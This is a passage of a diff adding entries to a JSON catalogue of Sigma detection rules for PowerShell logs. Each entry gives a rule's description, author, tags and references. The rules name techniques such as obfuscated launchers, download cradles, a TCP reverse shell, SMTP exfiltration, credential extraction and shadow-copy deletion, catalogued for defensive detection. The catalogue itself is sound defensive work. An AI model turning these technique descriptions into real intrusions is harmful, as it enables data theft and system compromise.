Obfuscated Powershell via COMPRESS OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_compress.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module" + }, + { + "description": "Detects suspicious PowerShell download command", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/05", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + "filename": "posh_pm_susp_download.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "de41232e-12e8-49fa-86bc-c05c7e722df9", + "value": "Suspicious PowerShell Download - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", + "value": "Invoke-Obfuscation Via Stdin - PowerShell Module" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_clip.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module" + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "meta": { + "author": "Florian Roth (rule)", + "creation_date": "2017/03/12", + "falsepositive": [ + "Very special / sneaky PowerShell scripts" + ], + "filename": "posh_pm_susp_invocation_generic.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "value": "Suspicious PowerShell Invocations - Generic - PowerShell Module" + }, + { + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "creation_date": "2020/10/05", + "falsepositive": [ + "App-V clients" + ], + "filename": "posh_pm_syncappvpublishingserver_exe.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "value": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_rundll.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_var.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", + "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module" + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "meta": { + "author": "Florian Roth (rule), Jonhnathan Ribeiro", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_susp_invocation_specific.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", + "value": "Suspicious PowerShell Invocations - Specific - PowerShell Module" + }, + { + "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/21", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "posh_pm_susp_reset_computermachinepassword.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "e3818659-5016-4811-a73c-dde4679169d2", + "value": "Suspicious Computer Machine Password by PowerShell" + }, + { + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "meta": { + "author": "frack113", + "creation_date": "2021/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_athremotefxvgpudisablementcommand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "38a7625e-b2cb-485d-b83d-aff137d859f4", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module" + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_susp_get_nettcpconnection.yml", + "level": "low", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", + "value": "Use Get-NetTCPConnection - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2019/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module" + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_susp_zip_compress.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ] + }, + "uuid": "daf7eb81-35fd-410d-9d7a-657837e602bb", + "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module" + }, + { + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_invoke_webrequest_useragent.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "d4488827-73af-4f8d-9244-7b7662ef046e", + "value": "Change User Agents with WebRequest" + }, + { + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "meta": { + "author": "frack113", + "creation_date": "2022/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_token_obfuscation.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_token_obfuscation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.009" + ] + }, + "uuid": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "value": "Powershell Token Obfuscation - Powershell" + }, + { + "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", + "meta": { + "author": "frack113", + "creation_date": "2022/01/12", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_gwmi.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://attack.mitre.org/datasources/DS0005/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml" ], "tags": [ "attack.persistence", + "attack.t1546" + ] + }, + "uuid": "0332a266-b584-47b4-933d-a00b103e1b37", + "value": "Suspicious Get-WmiObject" + }, + { + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell logs", + "meta": { + "author": "James Pemberton / @4A616D6573", + "creation_date": "2019/10/24", + "falsepositive": [ + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + ], + "filename": "posh_ps_web_request_cmd_and_cmdlets.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", + "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "1139d2e2-84b1-4226-b445-354492eba8ba", + "value": "Usage Of Web Request Commands And Cmdlets - PowerShell" + }, + { + "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2021/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_copy_item_system_directory.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1556.002" + ] + }, + "uuid": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "value": "Powershell Install a DLL in System Directory" + }, + { + "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", + "meta": { + "author": "frack113", + "creation_date": "2022/04/24", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_win32_product_install_msi.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ] + }, + "uuid": "91109523-17f0-4248-a800-f81d9e7c081d", + "value": "PowerShell WMI Win32_Product Install MSI" + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_stdin.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation STDIN+ Launcher - Powershell" + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/06", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_remote_session_creation.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", + "value": "PowerShell Remote Session Creation" + }, + { + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/19", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_extracting.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "bd5971a7-626d-46ab-8176-ed643f694f68", + "value": "Extracting Information with PowerShell" + }, + { + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_win32_shadowcopy.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", + "value": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script" + }, + { + "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", + "meta": { + "author": "frack113, Tim Shelton (fp AWS)", + "creation_date": "2021/10/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_windowstyle.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.003" + ] + }, + "uuid": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", + "value": "Suspicious PowerShell WindowStyle Option" + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "meta": { + "author": "frack113, MatilJ", + "creation_date": "2022/01/19", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_msxml_com.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", + "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "78aa1347-1517-4454-9982-b338d6df8343", + "value": "Powershell MsXml COM Object" + }, + { + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", + "meta": { + "author": "frack113, Duc.Le-GTSC", + "creation_date": "2021/08/03", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_detect_vm_env.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", + "https://techgenix.com/malicious-powershell-scripts-evade-detection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1497.001" + ] + }, + "uuid": "d93129cd-1ee0-479f-bc03-ca6f129882e3", + "value": "Powershell Detect Virtualization Environment" + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_compress.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell" + }, + { + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/18", + "falsepositive": [ + "Should not be any as administrators do not use this tool" + ], + "filename": "posh_ps_powerview_malicious_commandlets.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2020/10/08/ryuks-return", + "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", + "https://powersploit.readthedocs.io/en/stable/Recon/README", + "https://adsecurity.org/?p=2277", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "value": "Malicious PowerView PowerShell Commandlets" + }, + { + "description": "Detects creation of a local user via PowerShell", + "meta": { + "author": "@ROxPinTeddy", + "creation_date": "2020/04/11", + "falsepositive": [ + "Legitimate user creation" + ], + "filename": "posh_ps_create_local_user.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "243de76f-4725-4f2e-8225-a8a69b15ad61", + "value": "PowerShell Create Local User" + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cl_invocation_lolscript.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bohops/status/948061991012327424", + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "4cd29327-685a-460e-9dac-c3ab96e549dc", + "value": "Execution via CL_Invocation.ps1 - Powershell" + }, + { + "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/04", + "falsepositive": [ + "Unlikely" + ], + "filename": "posh_ps_psasyncshell.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/JoelGMSec/PSAsyncShell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "afd3df04-948d-46f6-ae44-25966c44b97f", + "value": "PSAsyncShell - Asynchronous TCP Reverse Shell" + }, + { + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/09/26", + "falsepositive": [ + "Legitimate script" + ], + "filename": "posh_ps_send_mailmessage.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", + "https://www.ietf.org/rfc/rfc2821.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", + "value": "Powershell Exfiltration Over SMTP" + }, + { + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/17", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "filename": "posh_ps_computer_discovery_get_adcomputer.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "db885529-903f-4c5d-9864-28fe199e6370", + "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell" + }, + { + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/17", + "falsepositive": [ + "Rare intended use of hidden services", + "Rare FP could occure due to the non linearity of the ScriptBlockText log" + ], + "filename": "posh_ps_using_set_service_to_hide_services.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "value": "Abuse of Service Permissions to Hide Services Via Set-Service - PS" + }, + { + "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + 